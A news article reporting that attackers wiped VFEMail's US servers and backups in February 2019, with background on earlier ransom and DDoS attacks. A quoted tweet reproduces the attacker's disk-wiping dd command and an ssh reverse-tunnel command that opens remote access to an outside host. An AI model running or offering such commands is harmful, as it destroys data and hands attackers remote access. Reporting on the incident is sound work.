- Email provider VFEMail suffered a large-scale attack that saw all of the company’s servers and backups being wiped.
- The provider revealed that the attack occurred on February 11 and it was much more complex than SSH exploits.
- The service is back up, but secondary domains continue to remain unavailable.
Email provider VFEMail revealed that all customer data from its US servers were wiped by hackers on February 11. The company’s webmail and client were taken down to investigate the attack, and the provider found out that all of the data including backups and file servers was missing. The attack was complex in nature, and its goal was to delete all data and unlike mother other server attacks that seek ransoms.
VFEMail is currently trying to recover user emails, but it is unlikely that they will be able to. The official website has been restored, but all secondary domains are still unavailable. Existing users who login will find empty inboxes and also receive an explanation on what happened. VFEMail has not revealed what its next course of action will be and if it will continue to remain operational as a service.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
This is not the first time VFEMail has suffered a cyber attack with the email provider being targeted by Armada Collective. The group of hackers had targeted VFEMail and a number of other providers and demanded ransoms if the providers wanted the DDoS attacks to stop. The largest known ransom paid to attackers was by South Korean web hosting company Nayana. The company paid $1 million to decrypt customer data that was seized.
Hackers usually indulge in stealing or leaking data, but there have been very few incidents in history that involve complete deletion on such a large scale. The biggest incident till date involves IaaS company Code Spaces being forced to shut down following a full data-wipe from hackers. Most modern-day attacks involve hackers using compromised servers to get access to private user data or to host malware and botnets. Hacked victims are then asked to pay a ransom to have normal access restored.